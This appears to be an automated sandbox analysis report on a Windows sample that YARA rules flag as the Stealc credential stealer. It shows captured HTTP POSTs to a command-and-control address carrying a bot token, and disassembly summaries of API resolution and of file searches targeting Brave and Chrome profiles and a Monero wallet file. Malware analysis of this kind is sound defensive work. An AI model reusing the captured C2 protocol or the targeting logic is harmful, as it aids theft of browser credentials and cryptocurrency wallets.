Sep 27, 2024 01:28:28.760339975 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 2d 2d 0d 0a Data Ascii: ------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="message"files------CFIECFIJDAAKEBGCGHIE--
Sep 27, 2024 01:28:29.053236961 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:28 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 01:28:29.054594040 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBF Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIJEBAECGCBKECAAAEBF--
Sep 27, 2024 01:28:29.827187061 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:29 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	19:28:08
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x980000
File size:	1'863'168 bytes
MD5 hash:	B1197DF51B22F8D4C9C9E0E552E8A627
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1591151333.000000000157C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1400571869.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00999860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76F70000,01570ED0), ref: 009998A1
GetProcAddress.KERNEL32(76F70000,01571110), ref: 009998BA
GetProcAddress.KERNEL32(76F70000,01570FC0), ref: 009998D2
GetProcAddress.KERNEL32(76F70000,01570EE8), ref: 009998EA
GetProcAddress.KERNEL32(76F70000,01571128), ref: 00999903
GetProcAddress.KERNEL32(76F70000,015793F8), ref: 0099991B
GetProcAddress.KERNEL32(76F70000,015661C8), ref: 00999933
GetProcAddress.KERNEL32(76F70000,015662A8), ref: 0099994C
GetProcAddress.KERNEL32(76F70000,01571020), ref: 00999964
GetProcAddress.KERNEL32(76F70000,01571038), ref: 0099997C
GetProcAddress.KERNEL32(76F70000,01571050), ref: 00999995
GetProcAddress.KERNEL32(76F70000,01570F00), ref: 009999AD
GetProcAddress.KERNEL32(76F70000,01566268), ref: 009999C5
GetProcAddress.KERNEL32(76F70000,01571140), ref: 009999DE
GetProcAddress.KERNEL32(76F70000,01571068), ref: 009999F6
GetProcAddress.KERNEL32(76F70000,01566448), ref: 00999A0E
GetProcAddress.KERNEL32(76F70000,01571158), ref: 00999A27
GetProcAddress.KERNEL32(76F70000,01571278), ref: 00999A3F
GetProcAddress.KERNEL32(76F70000,01566488), ref: 00999A57
GetProcAddress.KERNEL32(76F70000,01571248), ref: 00999A70
GetProcAddress.KERNEL32(76F70000,015662C8), ref: 00999A88
LoadLibraryA.KERNEL32(01571260,?,00996A00), ref: 00999A9A
LoadLibraryA.KERNEL32(01571218,?,00996A00), ref: 00999AAB
LoadLibraryA.KERNEL32(01571290,?,00996A00), ref: 00999ABD
LoadLibraryA.KERNEL32(015711E8,?,00996A00), ref: 00999ACF
LoadLibraryA.KERNEL32(015711D0,?,00996A00), ref: 00999AE0
GetProcAddress.KERNEL32(76DA0000,01571200), ref: 00999B02
GetProcAddress.KERNEL32(75840000,01571230), ref: 00999B23
GetProcAddress.KERNEL32(75840000,01579690), ref: 00999B3B
GetProcAddress.KERNEL32(753A0000,015795B8), ref: 00999B5D
GetProcAddress.KERNEL32(77300000,015664C8), ref: 00999B7E
GetProcAddress.KERNEL32(774D0000,01579518), ref: 00999B9F
GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00999BB6

Strings

NtQueryInformationProcess, xrefs: 00999BAA

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: c72f675dc733919d12ed24b77ace2c043f35b71cfff1faaef355ea8ad3a9ba18
Instruction ID: 5b2c33839bf8382c35bc4188c18cd369241814a02344a1dc82118f5f1c74d106
Opcode Fuzzy Hash: c72f675dc733919d12ed24b77ace2c043f35b71cfff1faaef355ea8ad3a9ba18
Instruction Fuzzy Hash: 85A13CB56002489FD344EFA8FD98E663BF9F78C309704851BA605C3264DF39A852CB57

Function 009845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0098460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0098479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009845D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009845E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009845F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009846B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009845C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009846AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009846D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009846C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0098462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009846CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009845DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00984734

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: ea0560619f2f14ddb0ebd913cc2682db322b73fec7f230fe5d3a419edfdc8cdc
Instruction ID: 8e8993ac4f6235c1021adf42a3817c664f698a5d469803a6dd4f357013b8976a
Opcode Fuzzy Hash: ea0560619f2f14ddb0ebd913cc2682db322b73fec7f230fe5d3a419edfdc8cdc
Instruction Fuzzy Hash: DB41E6717C67047ECE2CB7A4884EF9DB6565FCB7CAF53D044A82056282CBB079404DEA

Function 0098BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

FindFirstFileA.KERNEL32(00000000,?,009A0B32,009A0B2B,00000000,?,?,?,009A13F4,009A0B2A), ref: 0098BEF5
StrCmpCA.SHLWAPI(?,009A13F8), ref: 0098BF4D
StrCmpCA.SHLWAPI(?,009A13FC), ref: 0098BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0098C7BF
FindClose.KERNEL32(000000FF), ref: 0098C7D1

Strings

Brave, xrefs: 0098C102
\Brave\Preferences, xrefs: 0098C1DB
Preferences, xrefs: 0098C11E
Google Chrome, xrefs: 0098C634

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 4bf91fb4e43debd49ac09ed3cc6376bda082767de189c012207e0fd123e9fa28
Instruction ID: e4d39c6a52a5a9a45449e8068a296a84041c1d953976e997b2f7c2dbf13b97fb
Opcode Fuzzy Hash: 4bf91fb4e43debd49ac09ed3cc6376bda082767de189c012207e0fd123e9fa28
Instruction Fuzzy Hash: E4422E72910108ABCF14FBB4DD96FED737DEBD8300F404558B90A96191EE34AA49CBE6

Function 6CC935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CD1F688,00001000), ref: 6CC935D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC935E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CC935FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC9363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC9369F
__aulldiv.LIBCMT ref: 6CC936E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CC93773
EnterCriticalSection.KERNEL32(6CD1F688), ref: 6CC9377E
LeaveCriticalSection.KERNEL32(6CD1F688), ref: 6CC937BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CC937C4
EnterCriticalSection.KERNEL32(6CD1F688), ref: 6CC937CB
LeaveCriticalSection.KERNEL32(6CD1F688), ref: 6CC93801
__aulldiv.LIBCMT ref: 6CC93883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC93902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC93918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC9394C

Strings

GTC, xrefs: 6CC93912
MOZ_TIMESTAMP_MODE, xrefs: 6CC935DB
QPC, xrefs: 6CC938FC
GenuntelineI, xrefs: 6CC93639
AuthcAMDenti, xrefs: 6CC93946

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
